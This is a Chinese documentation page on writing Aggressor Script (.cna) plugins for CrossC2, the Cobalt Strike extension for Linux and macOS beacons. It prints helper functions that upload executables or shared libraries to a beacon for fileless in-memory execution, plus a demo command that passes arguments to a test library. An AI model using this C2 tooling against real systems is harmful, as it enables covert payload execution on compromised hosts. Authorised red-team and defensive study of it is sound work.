cna编写说明

首先是CrossC2Kit定义的公共基础函数,最终由 bcrossc2_load 函数负责向 CrossC2 beacon 下发需要内存无文件加载的可执行文件或者动态库, 以及运行时需要传入的参数。

include(script_resource("CrossC2Kit.cna"));

CrossC2Kit.cna:

sub random_string {
    # <3 @offsec_ginger
    $limit = $1;
    @random_str = @();
    $characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    for ($x = 0; $x < $limit; $x++) {
        $n = rand(strlen($characters));
        add(@random_str, charAt($characters, $n));
    }
    return join('', @random_str);
}

sub runType {
    $type = $1;
    if ($type eq "ELF" || $type eq "MachO") {
        return "0";
    } else if ($type eq "so" || $type eq "dylib") {
        return "1";
    }
    return -1;
}

sub genTaskinfo_dyn {
    $taskType = $1;
    $taskName = $2;
    $taskResType = $3;
    $juicySize = $4;
    $transportArg = $5;

    $taskinfo = "CrossC2^" . $taskType . "^". $taskName . "^" . $taskResType . "^" . $juicySize . "^" . $transportArg;
    return $taskinfo;
}

sub bcrossc2_load_dyn {
    $beaconid = $1;
    $taskType = $2;
    $taskName = $3;
    $taskName = $taskName . random_string(4);
    $taskResType = $4;
    $loadFileName = $5;
    $taskArgs = $6;

    $handle = openf(script_resource($loadFileName));
    $juicyData = readb($handle, -1);
    closef($handle);

    $juicySize = lof(script_resource($loadFileName));
    $taskType = runType($taskType);
    if ($taskType == -1) {
        berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
    }
    $ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $juicySize, $taskArgs);
    bupload_raw($beaconid,$ELFName,$juicyData);
}

下面将编写一个 “传入参数解析“ 功能的.cna插件demo

include(script_resource("CrossC2Kit.cna"));
ssh_alias cc2_parseArgs {
    $taskName = "cc2_parseArgs"; # 该任务的名称
    $taskType = "so";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # task返回值类型定义参考 "#变量定义"
    $loadlib = "test_parseArgs.so"; # 需要载入的动态库/可执行文件


    $beaconid = $1;
    $arg1 = $2;
    $arg2 = $3;
    $arg3 = $4;
    $transportArg = $arg1 . "^" . $arg2 . "^" . $arg3; # 将运行执行文件时需要传入的各个参数用'^'拼接

    blog($beaconid, "cc2_parseArgs: " . $arg1 . " " . $arg2 . " " . $arg3);

    bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
}

ssh_command_register("cc2_parseArgs", "CrossC2 dynamic run in memory demo", "Use: cc2_parseArgs arg1 arg2 arg3");

results matching ""

    No results matching ""